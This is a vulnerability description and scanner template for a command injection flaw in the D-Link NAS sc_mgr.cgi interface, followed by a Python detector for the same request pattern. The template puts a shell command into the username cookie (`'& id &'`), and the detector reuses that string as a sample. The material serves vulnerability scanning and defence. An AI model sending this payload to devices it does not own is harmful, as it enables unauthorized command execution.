Vulnerability Description
The D-Link NAS interface sc_mgr.cgi contains a command execution vulnerability that allows attackers to execute arbitrary commands on the device, potentially leading to unauthorized access or control over the system.
id: dlink-nas-rce

info:
  name: D-Link NAS `sc_mgr.cgi` - Remote Code Execution
  author: adeljck
  severity: critical
  description: |
    The D-Link NAS interface sc_mgr.cgi contains a command execution vulnerability that allows attackers to execute arbitrary commands on the device, potentially leading to unauthorized access or control over the system.
  remediation: |
    To remediate this vulnerability, ensure that the device firmware is updated to the latest version provided by the manufacturer. Additionally, consider implementing network segmentation and firewall rules to restrict unauthorized access to the device.
  metadata:
    verified: true
    max-request: 1
    fofa-query: 'body="/cgi-bin/login_mgr.cgi" && body="cmd=cgi_get_ssl_info"'
  tags: dlink,nas,rce,vuln

http:
  - raw:
      - |
        GET /cgi-bin/sc_mgr.cgi?cmd=SC_Get_Info HTTP/1.1
        Host: {{Hostname}}
        Cookie: username='& id &';

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
          - "404 not found"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e02550ff4143a026d7f244bd9910cd7231bc3f3caeffcc290fc77cbed1b0712a0220590cbcc5ecc6b49af94437d773a38efe02e13978ce90a2cf8343a7bc5f3e541a:922c64590222798bb761d5b6d8e72950
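For the defensive side, the request shape in the template above can be turned into a detection check for a reverse proxy or log pipeline placed in front of the NAS. The following is an added example, not part of the original template or any D-Link or Nuclei code; the function names, the `nas.example` host, the sample requests and the allowlist of username characters are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Assumption: legitimate account names use only these characters.
SAFE_USERNAME = re.compile(r"[A-Za-z0-9._@-]{0,64}")
TARGET_SUFFIX = "/sc_mgr.cgi"  # endpoint named in the template


def cookie_value(header, name):
    """Return the raw value of cookie `name` from a Cookie header, or None.

    Parsed by hand so that values with quotes and spaces are kept verbatim.
    """
    m = re.search(r"(?:^|;\s*)" + re.escape(name) + r"=([^;]*)", header)
    return m.group(1) if m else None


def inspect_request(raw):
    """Return a finding dict for a suspicious sc_mgr.cgi request, else None."""
    lines = raw.splitlines()
    parts = lines[0].split(" ") if lines else []
    if len(parts) != 3:
        return None
    method, target, _version = parts
    if not unquote(urlsplit(target).path).endswith(TARGET_SUFFIX):
        return None
    for line in lines[1:]:
        if not line:  # blank line ends the header block
            break
        key, _, value = line.partition(":")
        if key.strip().lower() != "cookie":
            continue
        user = cookie_value(value.strip(), "username")
        # Allowlist check: anything outside the expected alphabet is flagged.
        if user is not None and not SAFE_USERNAME.fullmatch(unquote(user)):
            return {"method": method, "target": target, "username": user}
    return None


# Constructed sample requests (not captured traffic); nas.example is a placeholder.
_REQ = "GET {} HTTP/1.1\r\nHost: nas.example\r\nCookie: {}\r\n\r\n"
SAMPLES = {
    "benign": _REQ.format("/cgi-bin/sc_mgr.cgi?cmd=SC_Get_Info", "username=admin; lang=en"),
    "flagged": _REQ.format("/cgi-bin/sc_mgr.cgi?cmd=SC_Get_Info", "username='& id &';"),
    "other_cgi": _REQ.format("/cgi-bin/login_mgr.cgi", "username='& id &';"),
}

if __name__ == "__main__":
    for label, request in SAMPLES.items():
        print(label, "->", inspect_request(request))
```

The check uses an allowlist rather than a list of shell metacharacters, so an encoded or unfamiliar separator in the `username` cookie is flagged as well.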